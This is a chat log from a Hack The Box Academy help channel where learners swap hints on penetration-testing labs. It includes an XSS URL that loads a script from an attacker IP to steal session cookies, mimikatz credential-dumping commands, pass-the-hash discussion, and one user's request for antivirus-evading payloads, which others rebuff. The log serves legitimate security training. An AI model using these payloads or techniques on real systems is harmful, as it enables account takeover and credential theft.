#modules

1 messages ยท Page 139 of 1

thorn urchin
#

dns

#

and bloodhound will still work with ntlm auth

tame ivy
#

but this creds given by module

thorn urchin
#

then youve entered them wrong

tame ivy
#

oh nvm. thx, my bad

ornate lava
#

any ideas?

orchid pine
#

finished the skill assessement part 1

#

using blood hound is a good idea

#

i have a question if someone did this

#

like a confusion if somone can help me with it

#

its about blood hound

thorn urchin
#

whats the question

thorn ingot
#

any idea?

sly dome
#

was something like that

#

lemme check

#

yea role:super

thorn ingot
sly dome
#

maybe burpsuite things

#

coz you havent got a role assigned

#

i think you messed up your encoding

thorn ingot
#

I tried using a cookie editor but that didn't work either

#

maybe

sly dome
thorn ingot
#

let me check again

#

I encoded it like this

#

I guess my problem is with the the hex delimiter

sly dome
#

sure it is

#

the cookie from the site has no delimiter

#

check that when decoding, also when you re-encode check you get the same result back

#

then you know you have the correct algorithm

sinful tundra
#

how do i load a moudle on open vpn

#

modules

fathom pendant
#

? Gonna have to be more specific my guy

idle kestrel
#

Anyone avalable for dm and hints regarding NTLM relay attacks - skills assessment?

cedar void
#

I don't know why the result of my 'cp' command says no directory even though the 'searchploit' result shows thats the path of the exploit that I want.

fathom pendant
#

You don't need to copy anything

#

You can straight up just use it

fringe shell
cedar void
fathom pendant
#

Yes

fathom pendant
fringe shell
fathom pendant
#

Fair

#

It's the same

#

When you set rhosts it sets rhost

sly dome
#

Firewall and IDS/IPS Evasion - Medium Lab
why is this solvable without a single evasion option?

#

also the Easy Lab do NOT need evasion to be solved

#

i feel scammed

supple patio
sly dome
#

evasion lab (hint no evasion needed)

#

at least the hard one is more interesting

sly dome
#

yea it was a cooler one, at least is a real evasion technique

#

nice module the nmap one

#

im reaching the passwords attack module, would you recommend using hashcat under my RTX 3070?

#

will it save my time?

lusty thicket
#

but yes

mystic marten
#

hi

sly dome
#

im kind of "scared"

sly dome
hot heart
#

Does anyone know why htb and htb academy aren't linked under the same account?

desert nymph
#

i have the same question xD

elfin cedar
#

Attacking Thick Client Applications

#

what is this?? ๐Ÿ˜ญ

tidal kelp
hot heart
#

I'm stuck on Firewall and IDS/IPS Evasion - Medium Lab

hot heart
#

I've been on this section for 3 hours now๐Ÿ˜ญ๐Ÿ˜ญ

#

I might be over thinking it

lusty thicket
hot heart
#

๐Ÿคฆโ€โ™‚๏ธ๐Ÿคฆโ€โ™‚๏ธ

lusty thicket
#

hint: scan both tcp and udp

hot heart
#

Can you give an analogy to a movie that doesn't directly give the answer away but still provides some kind of guidance? ๐Ÿ˜ญ

#

niceeee

#

forget what I said HAHA

lusty thicket
mortal rain
#

I'm new. Do I have unlimited access using openvpn from my vm? The free version only allow 1 instance.

elfin cedar
#

๐Ÿ’€

tranquil axle
hot heart
mortal rain
lusty thicket
hot heart
#

I know

#

I was kidding haha

#

your a life saver

mortal rain
#

Never mind. I just figure it out.

hot heart
lusty thicket
hot heart
mortal rain
signal condor
#

Can some one help me with the linux module

hot heart
hot heart
signal condor
#

Find files and directories

#

I am wanting to thow a keyboard or at lease eat one

mortal rain
signal condor
#

I am stuck on the first question

#

I have used the following

#

Find / -name *.conf - size +28K -size -25k

mortal rain
#

I decided to quit HTB and just learn through THM.

THM: Let me guide you through the process
HTB: Here the box. Now root it

lusty thicket
signal condor
#

What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?

mortal rain
hot heart
#

Its in the module above

signal condor
#

Thanks

hot heart
#

you just gotta look for ti

signal condor
#

Wait.

mortal rain
lusty thicket
#

find / -type f -name *.conf -size +25k -newermt 2020-03-03 -ls 2>/dev/null

fossil parrot
hot heart
#

HTB will pay off when it comes to you having to think on your own

mortal rain
fossil parrot
hot heart
#

Its up to you, but I think the learning process on HTB is way more valuable

mortal rain
#

I see

hot heart
# mortal rain I see

I've honestly been curious about trying to utilize THM in terms of better assisting ones understanding for HTB material, so let me know what happens with whatever you decide

mortal rain
hot heart
# mortal rain Since I'm on the Linux foundation module, I was thinking taking Linux in THM and...

Yeah that's not a bad idea, I've completed the THM linux module, and it provides a pretty good walkthrough especially if its your first time, but like I said earlier HTB provides a more rigorous learning approach forcing you to ingest the material through trial and error rather than just telling you how to do it. But theres nothing wrong with building a foundational understanding first and then coming back to tackle the more advanced modules

#

Plus theres no sense in trying to convince yourslef that you can excel without the basics, we all had to go through it

mortal rain
hot heart
#

Once you progress enough you'll realize both platforms are the same thing especially in terms of doing it yourself when it comes to trying to find the answer.

thorn ingot
#

Can someone give me hints on Skill Assessment - Broken Authentication?

#

been stuck for hours

vital adder
thorn ingot
# thorn ingot Can someone give me hints on Skill Assessment - Broken Authentication?

What I have done so far

||I found the password policy:
start with a capital letter
contain at least one lowercase
contain at least one special char: $ # @
must be of length 20 or longer
end with a digit

I tried using ffuf and wfuzz in the register page and messsages page but no hits. I found the guest username via burpsuite amd the support username

I also noticed there's a rate limiter, I tried using the script provided by the module but that didn't really work.

I tried tampering with cookies but it was only my username after decryption (url decode --> from base64 --> md5). So I thought I should be logged in with another user||

elfin cedar
#

the thick client thing is insane

#

seriously its from an insane box called Fatty ๐Ÿ’€

#

I'm reporting it

hallow kiln
#

lol, reporting what exactly?

simple barn
#

Hi Everyone, I'm taking the Penetration Tester Job roll path. Previously I subscribed as a student. However, I didn't complete the path due to personal matters. Now I've restarted the module and when I try to access modules I'm being asked to pay. When I go to billing to make a purchase as a student the option is disabled. How can I make payment as a student ? Is this option available?

fathom pendant
simple barn
#

Ok I'm sure I've access to the student account. Just not sure why its disabled. I'll check again. Thank you

mellow silo
#

i need help with something simple and silly, im doing linux fundamentals and i made it to system information, literally the first exercise, im trying to connect to the ssh target, I was given a username and password, and this is what im typing : sudo ssh username password, and it's not working

#

any idea whats going on?

lusty thicket
mellow silo
#

ssh: Could not resolve hostname username: Name or service not known

#

its probably simple but i'm trying to figure it out, but this has been taking some time with me

lusty thicket
mellow silo
#

yep

lusty thicket
#

maybe try resetting the machine

mellow silo
#

i'll give it a try

#

just connecting to the vpn again

#

alright, the website finally gave me an ip

#

done ๐Ÿ‘

lusty thicket
mellow silo
#

yep

#

ssh worked this time

lusty thicket
#

awesome!

barren apex
#

can anyone help me on the linux priv esc skills assesment

barren apex
#

Cant seem to get ||tomcat|| creds to work on the web gui

fiery berry
gentle coral
#

Morning all, very quick one, doing the laudanum module in shells and payloads, and on the second question it's asking for the path of the webshell. Ive tried /usr/share/webshells/aspx/, /usr/share/laudanum/shell.aspx, I also carried out a find for shell.aspx which brought up some /opt/ directories, neither of them worked.
I'm doing this through the pwnbox as per the question.
Any help would be greatly appreciated, thanks

barren apex
fiery berry
fathom pendant
gentle coral
#

@fathom pendant thank you kindly, all sorted now ๐Ÿ‘๐Ÿป

hardy frigate
#

Hi there! Has anyone done chapter Tapping Into ETW from Windows Event Logs & Finding Evil module?

solid gate
#

I wanted to leave feedback on the feedback option.
This is what it looks like for currently. Inspite of the bot saying "You can leave any comments here [...]" the conversation was automatically ended and I can infact not leave any feedback.

#

Only just saw this now. At the top it says "Back in 1 hour". Is that the reason?
If so, the message of the bot is still quite misleading.

sly dome
#

censorshipkek

#

or tag Emma she is really active in the chat

solid gate
solid gate
#

Okay, guess I'll go there. Thanks. ๐Ÿ™‚

stark atlas
#

crackmapexec - What's the full name of the smb module that starts with zero?

I cannot see any modules beginning with 0... anyone able to help?

autumn pilot
#

focus on the word itself

stark atlas
median meteor
#

Hey, Any recommendations on which wordlist to try on gitlab attacking module, have tried xato/xato-dup/cirt,names, but by far no luck by finding username for gitlab ๐Ÿ˜ฆ

#

Also trying to use both sh and py tools to enumerate users

sterile epoch
#

Hi I was doing the footprinting module and I tried executing odat.py so I copied the bash install file and excuted it and yet I cannot run ./odat.py

#
โ”Œโ”€[eu-academy-1]โ”€[10.10.15.80]โ”€[htb-ac-399878@htb-q92nqnbw70]โ”€[~]
โ””โ”€โ”€โ•ผ [โ˜…]$ ./odat.py -h
-bash: ./odat.py: No such file or directory
sterile epoch
#

nvm i found it thanks anyways

fathom pendant
#

You need to do it from the directory created iirc

stark atlas
orchid pine
#

XD ๐Ÿ˜‚

fossil parrot
#

Who knows to solved this modules https://academy.hackthebox.com/module/145/section/1295
is supposed is supposed response it's like this <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>Apache Tomcat/X.X.XX</title>
<link href="favicon.ico" rel="icon" type="image/x-icon" />
<link href="favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="tomcat.css" rel="stylesheet" type="text/css" />
</head>

<body>
    <div id="wrapper">
        <div id="navigation" class="curved container">
            <span id="nav-home"><a href="https://tomcat.apache.org/">Home</a></span>
            <span id="nav-hosts"><a href="/docs/">Documentation</a></span>
            <span id="nav-config"><a href="/docs/config/">Configuration</a></span>
            <span id="nav-examples"><a href="/examples/">Examples</a></span>
            <span id="nav-wiki"><a href="https://wiki.apache.org/tomcat/FrontPage">Wiki</a></span>
            <span id="nav-lists"><a href="https://tomcat.apache.org/lists.html">Mailing Lists</a></span>
            <span id="nav-help"><a href="https://tomcat.apache.org/findhelp.html">Find Help</a></span>
            <br class="separator" />
        </div>
        <div id="asf-box">
            <h1>Apache Tomcat/X.X.XX</h1>
        </div>
        <div id="upper" class="curved container">
            <div id="congrats" class="curved container">
                <h2>If you're seeing this, you've successfully installed Tomcat. Congratulations!</h2>

<SNIP>

sly dome
#

read the section

solid gate
#

Okay, about the Password Attacks module again, this time a question.
I'm failing at the task where you have to mutate the password list.
I mutated the provided password list with the provided rules and ran hydra against the SSH server with said mutated pw list and the user "sam". It has been running for a solid one and a half hour now.
What am I doing wrong? ๐Ÿ˜–

hallow kiln
solid gate
#

Oh.

#

Well, fair enough I guess.

split ruin
#

How come one command shows two different outputs in ACL enumeration section? or am i not understanding it correctly?

Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $adunnsid} -Verbose
solid gate
#

In any case, thanks for the hint! ๐Ÿ™‚

hallow kiln
#

The module is a bit tedious a whole

solid gate
#

Yeah. I'm at the start of the module and I already have an oppinion... oh well.

hallow kiln
#

There's still a lot to learn from it, but it's not making anyone's favourite list

livid zephyr
#

module:hacking wordpress,. The directory indexing exercise, I don't think I am connecting to it. I try ping it, gobuster, nmap, curl -s -X, and using a browser. I even re-donwload my vpn file and reset. But I either get an 'unable to connect' or not found message. My ip starts with 10.10.x.x, the target starts with 83.136.x.x. Does any one has similar issue? and how did they resolve it?

rustic sage
livid zephyr
#

i wander if it is my network then.

rustic sage
livid zephyr
balmy radish
#

Are you using the port they give you?

livid zephyr
livid zephyr
rustic sage
#

what happens when you use your browser?

#

also never do -X GET ๐Ÿ™ƒ

livid zephyr
sly dome
#

for that host you do not need vpn

#

its a publicly exposed service

sly dome
fathom pendant
#

Try restarting the target

sly dome
#

i can reach

fathom pendant
#

Weird then

#

That looks like a personal issue with it getting blocked, maybe firewall rules or something

livid zephyr
# fathom pendant Try restarting the target

oh.. that may be the problem then.... ok, disable the vpn, reset the target and now I am able to access it. When do you know if you require the VPN file? I always assume that all the exercises within HTB will require the VPN file.

rustic sage
#

i mean i was connected to the VPN for all of Hacking WordPress and had no issues lol

sly dome
#

yea

fathom pendant
sly dome
#

its a public exposed IP

#

83.X.X.X

livid zephyr
#

thanks everybody, I was able to access it.

fathom pendant
#

It sounds like the vpn took over as your main network interface

livid zephyr
fathom pendant
livid zephyr
worn matrix
#

can anyone tell me,why nmap doesnt show RECEIVED packages with --packet-trace ? only send packets

#

i did everything,but still cant

#

its so annoying,i cant continue the path

#

maybe its something with the version?

#

any help plz?

upper ruin
#

So that's not even a handshake.

#

Essentially it sends, but doesn't receive.

#

The host is up but it filters the traffic.

#

Which port are you on?

zenith wraith
#

hello

worn matrix
#

i thought it isnt even a handshake.but on HTB tutorial,it gets a response,in the same local IP.maybe its my fault somwhere?

#

forget it,it showed received.maybe something is wrong with the example that HTB giving

#

on another nmap scan it gave Received pcakets

flint scaffold
#

Hi All, I am working on Skill Assessment -- Broken Authentication Assess the web application and use various techniques to escalate to a privileged user and find a flag in the admin panel. Submit the contents of the flag as your answer. Can I get some help?

sly dome
orchid pine
#

platform down

languid fjord
#

We are aware

#

Team is working on it

orchid pine
#

thank you guys

#

the null session is ebaled right

#

but when trying to enumerate shares getting

thorn urchin
#

null sessions can be enabled and still have listing denied

orchid pine
#

i see

#

got you

thorn urchin
#

other stuff you can enumerate with a null session. Also worth checking for anonymous sessions and the guest account

orchid pine
#

yeah im trying to do so i found thet athe guest is dibled

#

disabled

empty hedge
#

Guys is the website of htb academy down?

rustic sage
empty hedge
languid fjord
#

seems back up now

#

@empty hedge @orchid pine

orchid pine
#

thank you ema and the teamm

thorn urchin
orchid pine
thorn urchin
#

incorrect

#

they just often have the same results

orchid pine
#

i found on crackmap documentation

#

that we can use -u 'a' -p ''

#

but the tools shows that they are taking the a like a user

thorn urchin
#

yes

orchid pine
#

[-] INLANEFREIGHT.LOCAL\a:

#

like im submitting a user a

thorn urchin
#

null session is when you provide no user no password hence null. anonymous session is when it accepts any user/pass

#

theyre different, but often have the same level of access(or lack thereof)

orchid pine
#

oh i see now the diffrnce thank you

thorn urchin
#

Ive seen a box before that had different permissions for null, anon, and guest all on the same box ๐Ÿ˜‚

orchid pine
#

ig thers is nothing left to do with smb

#

wtf

thorn urchin
#

you can do a bunch of other enumeration with null session besides shares

orchid pine
#

XD

#

yeah yeah i got nothing here

#

checking ldap

#

may be ill find somthing

thorn urchin
#

the first user creds are unfortunately the most important creds in ad hacking

#

next only to da/krbtgt creds

orchid pine
#

yeah and most of the time they are hard

orchid pine
thorn urchin
#

only credentials for a domain admin or the krbtgt account are more valuable than the first ad creds you get

orchid pine
#

yes yes i agree

thorn urchin
#

and dont forget that a machine account hash counts as an ad user cred

#

thats my latest ad obsession

flint chasm
#

Hi all
Can someone help me with "Credential Hunting" from Windows Privilege Escalation?
I got some files but I cant find correct password ๐Ÿ˜ฆ

rustic sage
#

but do you have the right files

#

check the hint as well

flint chasm
#

I saw that I should searching in C:/Users

#

i got passwords.txt for example but there are lots of them

orchid pine
#

@thorn urchin i tried like 2 hours ago some poisning right i found a user but the hash caputring was skipping

#

ill show you i didnt know why

elfin cedar
#

what is the point of this thick client section in the Attacking Common Applications module? To show we don't know crap about nothing??

upper ruin
sly dome
#

check Fatty machine ๐Ÿ™‚

elfin cedar
orchid pine
#

and i want to do the poisning from my attack box even tho i pointed the responder to ligolo interface its not listning on that ip adresse

upper ruin
rustic sage
thorn urchin
rustic sage
#

but this will help you with taking good notes and you'll build a pretty good password list.

upper ruin
flint chasm
orchid pine
thorn urchin
#

No other pivoting tool lets you either so I dont feel its a necessity to have it work, but itd be cool if it can. I just havnt had time to go back to a lab where I could test it

rustic sage
#

Hi there! Iza here! Can anyone help me please talk to an admin/mod about a paid collaboration proposal?

Thank you so much!

thorn urchin
# orchid pine

yup it skips hashes for ones its already found. Gotta go open the logs to get the hash

orchid pine
#

broo i started with this wtf like 2 hours ago

#

and i was wasting time looking at those null session

#

XD

thorn urchin
orchid pine
#

anyway was worth trying some crackmap

hot heart
#

Is parrot better than Kali, in general and for HTB modules

edgy flame
#

For the last question in the ffuf skills assessment: Try fuzzing the parameters you identified for working values. One of them should return a flag. What is the content of the flag?

Can someone please point me to a wordlist that works?

orchid pine
edgy flame
orchid pine
#

guys can someone guide me through this question

thorn urchin
orchid pine
thorn urchin
#

unfortunately makes it nearly impossible to hint at without spoiling the actual answer

#

so you need to think dumber

#

whats a common very low effort easy thing to try

orchid pine
#

i tried too many things but noone of theme work

thorn urchin
#

think basic basic stuff

orchid pine
#

the only thing i can do from this point trying some password sparying may be

hot heart
#

Does anyone know why I keep getting password errors?

#

I'm typing: Academy_WinFun!

#

and it won't register

#

Yes I checked for caps lock

#

I'm starting to think the openvpn file isn't processing all the way when I run the sudo command

sly dome
#

you are indeed connected to the vpn

#

coz the host is responding

#

which section?

thorn urchin
orchid pine
thorn urchin
#

cheers

orchid pine
#

creat a wor lsit and now trying some spray

#

thx

hot heart
#

It was working fine yesterday

sly dome
#

why do you need ssh there xD

#

it does not even give you credentials

hot heart
#

Yea but I'm trying to connect my own VM instead of using the browser one

#

lol

#

Unless I'm doing it completely wrong

sly dome
#

what

#

connect vpn and start with your nmap scanning and evasion

hot heart
#

No I mean like I have my own hypervisor and vm machine that I want to use to complete the challenge instead of using the HTB acadmey browser pwnbox VM

#

Oh I see what your saying

sly dome
#

nice you figured it out

leaden yew
#

Questions regarding Module: Cross-Site Scripting, Section: Session Hijacking.

  1. In this scenario, are we pulling the cookie for the admin once our local script.js is run? Or the cookie of the target user entering the information into the form?
  2. How would this work in a real-world scenario? Are we somehow supplying the URL with our injection to our target? OR are we using the injection ourselves against the form to receive the cookie value like we did in the module?
livid zephyr
#

hacking wordpress, user enumeration - the 'jq' command only shows one user (id=1), not id=2 shows. But when I use the browser, http://94.237.62.195:50451/?author=2. It shows that the URL title says 'D... L...', but the 'Author: ' shows blank for the name. Why?

sly dome
sly dome
leaden yew
sly dome
#

yea reflected you have to send the URL

#

maybe using Open Redirect to mask your malicious intent

#

for this is where your creativity afloats

leaden yew
#

So in theory I can send a link to a target, where it executed my script, but then redirects to the legit registration page? Something like that?

sly dome
#

no, Reflected XSS is when the payload travels with the request and then it gets reflected in the page

leaden yew
#

So then this session hijacking is an example of DOM based?

sly dome
leaden yew
sly dome
#

idk if the payload is presented as part of the HTML (DOM) or stored in the backend and reflected

leaden yew
sly dome
#

exactly

leaden yew
#

ok, but in the example in the section, would the real-world example be someone sending a URL with the payload to the target, then attempting to hide the intent by re-directing to the legit registration page after receiving the cookie value?

sly dome
#

no no

#

it doesnt work like that

#

in the session hijacking you cant send the payload via URL

#

that would be for an reflected XSS

#

in a stored XSS you can tell your victim "hey check this page"

leaden yew
#
http://10.129.115.102/hijacking/?fullname=test&username=test&password=test&email=test%40me.com&imgurl=%22%3E%3Cscript+src%3Dhttp%3A%2F%2F10.10.16.55%2Fscript.js%3E%3C%2Fscript%3E`
sly dome
#

and the page is infected

leaden yew
#

I couldnt just sent this?

sly dome
#

you sending that to me for example will only lead to me registering with that data

leaden yew
#

sure, but wouldn't the script run regardless (if we're on the same network) and provide a cookie value once its redirected to my index.php script?

sly dome
leaden yew
#

why not?

sly dome
#

the trigger is on the page where that data is presented (can be presented as DOM or loaded after retrieving it from the server which is stored XSS)

#

try it yourself, click on that link

leaden yew
#

it works

sly dome
#

something weird is happening behind then xD

leaden yew
#

it still sending the data within the URL

#

it will just automatically go to the "thank you for registering" page

sly dome
#

coz the XSS is when the admin checks your profile data

livid zephyr
leaden yew
#

I guess thats where my confusion lies, whos cookie are we getting? Is it the admin who is grabbing the information that we've stored on the back-end with the registration that was submitted?

orchid pine
#

why crcakmap is saying that is from untrusted domain

#

shoud i add the domaine in the user

sly dome
#

when you click on the link?

#

im getting the admin cookie

leaden yew
#

Can I DM yoU?

sly dome
#

sure

sly dome
orchid pine
livid zephyr
sly dome
#

nooo

main inlet
#

I'm having some trouble with the Getting Started Module - Service Scanning section.
I'm on the last question of the interactive terminal, and I keep trying to follow what the lesson taught to access the smbclient shares, but it keeps giving me this list of commands whenever I try to execute the command to log in as the user bob. Any suggestions?

orchid pine
#

[-] ERROR(SQL01\SQLEXPRESS): Line 1: Login failed for user 'INLANEFREIGHT.LOCAL\netdb'.
does crackmap support windows authe

#

never mind google is a good resources to use

fathom pendant
#

If only there's a --windows-auth

thorn urchin
#

well he did figure it out right after he asked lol

orchid pine
hot heart
#

Am I still scanning for TCP and UDP in the Firewall and IDS/IPS Evasion - Hard Lab? I've tried every command I keep getting nothing in return

rustic sage
orchid pine
#

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)
guys

#

help

rustic sage
#

have you tried researching this error and what it means?

orchid pine
#

like i have admin privliges i can dump all the hashes of the local machine

orchid pine
#

oki

#

check dms

orchid pine
#

idk if im just too stupid

#

i can passthe hash but my dearcrackmapexec saying its worng

thorn urchin
orchid pine
#

local admin

thorn urchin
#

well there ya go

orchid pine
#

but i cannot

#

use the --local-auth with win rm

thorn urchin
#

so?

#

winrm is working there

orchid pine
#

๐Ÿ˜‚

#

i need to take rest

thorn urchin
#

I was gunna say, didnt you literally learn this lesson a couple hours ago lol

#

maybe bed time to absorb the info

orchid pine
#

yes i did

#

my bad insteda of doing --local-auth on crackmapexec

#

i was doing it with evil-winrm

#

and i taught crcakmap has no local-auth for winrm

thorn urchin
#

Ive confused arguments between diff tools before as well

orchid pine
#

and i was os mad

#

because im juts being stupid XD

rustic sage
#

make sure you're noting this down in your notes ๐Ÿ˜›

orchid pine
#

btw want to ask you

#

big notes

#

like local admins can be admins on other machines

rustic sage
#

no. "local"
they could be using the same password though

orchid pine
#

i was trying to not confusing things

#

btween a password reuse

#

and being admins on multiple machine so its worth to check

rustic sage
#

as you go through a pentest you'll want to (in my opinion)

  1. check admin password reuse on other hosts
  2. keep updating a password list with all the passwords you find on that assignment to check if any of them are reused
orchid pine
#

thank you so much ig enogh forme today

#

im not gonna be able to understand thoingslike this

#

so bettter to take a rest

rustic sage
#

breaks are important

#

can't learn everything in one day

worn matrix
#

guys its not about HTB,but anyone has any idea which docker desktop doesnt run in windows 10?i mean i have tried everything but always its getting misconfigured with the WSL,maybe anyone has any general idea to follow some steps?thanks

rustic sage
hot heart
#

Is anyone on?

#

Nvm got it

#

Does anyone know if I'm on the right track? This is for the last box in network enumeration

fathom pendant
#

Is that the firewall hard one?

#

Make sure you use the right source port ๐Ÿ˜‰

hot heart
#

yes๐Ÿ˜ซ๐Ÿ˜ซ

fathom pendant
#

Also it helps if you actually provide the command you used

#

You can delete it after

#

Also you'll need to do -p-

#

As the answer is on a non-standard port

hot heart
#

Okay I think I might know what you mean

#

Im still getting the same thing

fathom pendant
#

Wrong source port

#

Think about what's taught to you in the ids/ips evasion section that goes over different techniques

lusty thicket
hot heart
#

Thanks @fathom pendant

fathom pendant
#

It pays to actually process and read info

hot heart
#

I'm learning that๐Ÿ˜ญ

#

the hard way...

fathom pendant
#

Notes are extremely useful

fathom pendant
# hot heart

Literally my notes on this assesment was just a backlink in obsidian to the specific section lmao

hot heart
#

๐Ÿคฃ๐Ÿคฃ

#

Im literally about to do the same thing

#

My god that took way too long

#

I almost pulled one of these

fathom pendant
elfin cedar
#

How was I supposed to know to ffuf for vhosts? Attacking Common Applications - Skills Assessment II

thorn urchin
fathom pendant
#

^

elfin cedar
#

thanks ๐Ÿ˜ญ

tulip coral
#

Hey Good Morning can i get a nudge on Web attacks skills assessment ?

fathom pendant
#

Did you try the things from the module

tulip coral
#

@fathom pendant Yes i did ... maybe im going in the wrong direction... i have a token for an admin account, so i tried to reset it im getting Access denied

fathom pendant
#

Have you re-encoded the token

tulip coral
#

I tried a couple other Verbs in my request and filled out the parameters

fathom pendant
#

I haven't done the module myself but surely you're overlooking something simple ยฏ_(ใƒ„)_/ยฏ

tulip coral
#

token does not seem encoded from the source code

#

I will keep looking

sly dome
tulip coral
#

thx again got it

fathom pendant
#

As it contains the flag

sly dome
#

๐Ÿ’ช๐Ÿป

tulip coral
#

wrong chat

#

mybad

fossil parrot
#

Anyone knows how to fix this error?

vital adder
#

try this on the pwnbox

git clone -q https://github.com/epinna/tplmap.git;cd tplmap
virtualenv -p python2.7 tplmap
source tplmap/bin/activate
pip install -q -r requirements.txt
./tplmap.py
vital adder
flint chasm
#

Hi All
Maybe you know how can I escalate privileges?
I was trying to find PowerUP or Bypass-UAC script but with no results ๐Ÿ˜ฆ

fossil parrot
#

I want run on my machine

vital adder
#

try it in a vm, why on earth would you do it in WSL?

fathom pendant
#

Yeah wsl is... not great

#

Like if you have absolutely 0 other options

vital adder
flint chasm
#

I was also trying to copy it from my machine or to create these scripts on the windows but with no result

#

On the learning path these scripts were in Public folder but there are no any files in this folder

vital adder
#

all of the tools that you'll need for this section is in the Tools directory and you can access that from the target machine by hosting an smb server on your attacker machine which is showed in the section

fossil parrot
fossil parrot
vital adder
sly dome
#

or just dont use tplmap kek

fathom pendant
#

That's part of the module I guess

#

So they wanna use it

fossil parrot
#

What command need to get the flag?

fathom pendant
#

One of them

#

Probably reading the question carefully will tell you

fossil parrot
sly dome
#

๐Ÿคฃ

#

skill issuee

fathom pendant
#

Well you cut off the question but I can assume it says "environment variable" or something

analog dock
sly dome
#

as the question tells you

#

you do not even need a shell

fathom pendant
sly dome
sly dome
#

i love solving little web questions from my iphone

fathom pendant
lusty thicket
flint chasm
rustic sage
#

does someone know why it always says that the host is down?

#

in the nmap module

twilit gull
#

Hi guys, If an ip address is given. What is the best way to find out whether the ip adddress is a member of workgroup or domain? (in linux)

rustic sage
#

nmap uses ping to determine if a host is up or down, using -Pn basically just means assume the host is up

rustic sage
#

weird

#

refresh the page and make sure the target is actually still alive
sometimes things just need a reset

sly dome
#

which section

vale plume
#

in linux fundimentals-file system management there is a question asking How many disks exist in our Pwnbox? (Format: 0). ive tried things but havent been able to get the right answer

rustic sage
#

i believe someone reported that as broken

sly dome
#

well, enough time to fix it

#

staff sometimes not good enoughโ€ฆ

bitter needle
#

Hi

#

what is that server ?

#

you learn how to hack ?

sly dome
rustic sage
#

considering they don't know what this server is, i doubt they have an account

sly dome
#

not relevant

analog dock
#

I donโ€™t understand why people even join a server if they donโ€™t know what it is

sly dome
#

in #welcome there is a description of the server

rustic sage
sly dome
#

i had no problem

rustic sage
sly dome
#

reset the target i think

rustic sage
#

Maybe change browser ?

rustic sage
neat meteor
#

command

sly dome
#

ping?

rustic sage
rustic sage
sly dome
#

<@&861185840277487616>

rustic sage
#

this is only for help with HTB Academy modules

sly dome
rustic sage
#

thats why im asking that

rustic sage
#

well i didnt expect serious rule break on first message xd

#

this is an ethical hacking server / learning platform. when you phrase your question like you want to use metasploit against a server how do you think people are going to take it?

#

if you need help you should specify what module and section you're working on and where you're confused

sly dome
#

he literally said how to use metasploit against a server

rustic sage
#

you're not in the wrong lol if that truly was an academy question it was very pooly worded

rustic sage
#

however i need lot of help about that and in this group chat we cant send pics videos etc. so i will try to learn that somewhere else

acoustic owl
rustic sage
sly dome
#

also if the English language is not your strong point, use DeepL an AI powered translate service

rustic sage
# acoustic owl You can post images Read and follow <#477042232109826048>

cant find the way how to post images etc. didnt use discord for years since i was gaming... in this case i need some cheat sheet for "shell and payloads" so i can choose right exploit and use them properly (i mean for wide using) and from "metasploit module" packer which makes fud payloads, there is many of them and first two didnt work for me, so if someone knows i would be glad to learn that on one place

rustic sage
rustic sage
acoustic owl
rustic sage
#

tried to find packer etc online i had no luck so i resume with shell and payloads module, not much info online about anything, i found something but lot of bullshit online

acoustic owl
#

The CheatSheet you can find here

rustic sage
#

i mean something like that but in pdf for all cases smb sql etc

#

same with making fud payload

#

no education platform is going to teach you everything

#

this is an always changing field

#

and you can just convert it to a PDF yourself...?

acoustic owl
#

Metasploit will not work in every case ๐Ÿคท๐Ÿปโ€โ™‚๏ธ

rustic sage
#

^^^^

sly dome
#

another case of skill issue?

rustic sage
#

yes

sly dome
vital adder
#

i am loving every second of this ๐Ÿฟ

rustic sage
#

its a "metasploit will solve all my problems" case

sly dome
#

i wonder why they prohibited it for OSCP

rustic sage
#

i mean you can use it once lol

sly dome
#

haha true

rustic sage
#

but that's an easy workaround in my opinion, i feel bad for the people who use sqlmap for everything

#

most, if not all, the things you can do within metasploit can be done with public pocs

sly dome
#

yea just read the ruby code and create your own Python one ๐Ÿ˜Ž

orchid pine
#

Guys i dont gave my pc infront of me is there any module that cover osint in htb academy

sly dome
#

but yea is a super tool for getting tedious job done

rustic sage
#

that's what i thought, but i threw in a little disclaimer to cover my back lol

rustic sage
#

but yes 1000 cubes

sly dome
#

metasploit does not deserve the hate, but i think its due to a lot of script kiddies using it the wrong way

#

imo is an awesome tool

rustic sage
#

it's a great tool, especially if you learn ruby and craft your own payloads/exploits

sly dome
#

yea and the little command and control you can setup

rustic sage
#

however i need some page where i can learn that, i work on burpsuite academy too

sly dome
rustic sage
acoustic owl
rustic sage
#

im trying to learn servers attack etc

#

then do the server-side attacks module

#

but for now i need some help about metasploit

#

you're not learning anything by running a metasploit script

#

learning isn't setting rhost and then typing exploit

#

and i tried to imort some ruby payloads to metasploit or encoders

orchid pine
sly dome
rustic sage
#

but i need some cheat sheet which gonna make job easier

#

you're not always going to be givien a cheat sheet

rustic sage
#

something like metasploit cookbook

orchid pine
#

a 1000 cubes men ๐Ÿฅฒ

rustic sage
#

you're not going to make it far in this field by expecting a cheat sheet with everything you do...

#

but latest version

rustic sage
#

boo hoo๐Ÿ˜ญ you have to learn and do something yourself instead of expecting the work to be done for you... sooo tragic

acoustic owl
rustic sage
#

that would require reading which they're clearly bad at

#

they want you to just give them the commands

acoustic owl
#

he will quickly realise that he won't get far with Metasploit.

vital adder
# rustic sage something like metasploit cookbook

so let me get this straight, you don't want to learn how the attacks work so you want metasploit to do it for you, but you are so lazy that you don't even want to learn how metasploit work so you are begging for a godly "cheat sheet" that would make you a pro at being a script kiddies?

sly dome
#

also with the number of situations this field have is impossible that a good cheat sheet exists

#

xd

rustic sage
#

wait... are you telling me being able to search in metasploit and then being able to set options and typing exploit isn't learning๐Ÿ˜ฑ ๐Ÿ˜ฑ

sly dome
#

you need a METHODOLOGY

acoustic owl
rustic sage
#

well im not going explain myself, im just asking for xor aes encryption code or some ways to hack servers with metasploit

lusty thicket
rustic sage
#

but C didnt get zero detections for me

sly dome
#

i told you

rustic sage
#

so im asking alternative ways

vital adder
sly dome
#

HAHAHAHA

rustic sage
#

well i tried xd

#

you guys don't want to hack servers with me with metasploit?

#

hahahaha

sly dome
#

ban him

rustic sage
#

bye anyway

acoustic owl
rustic sage
#

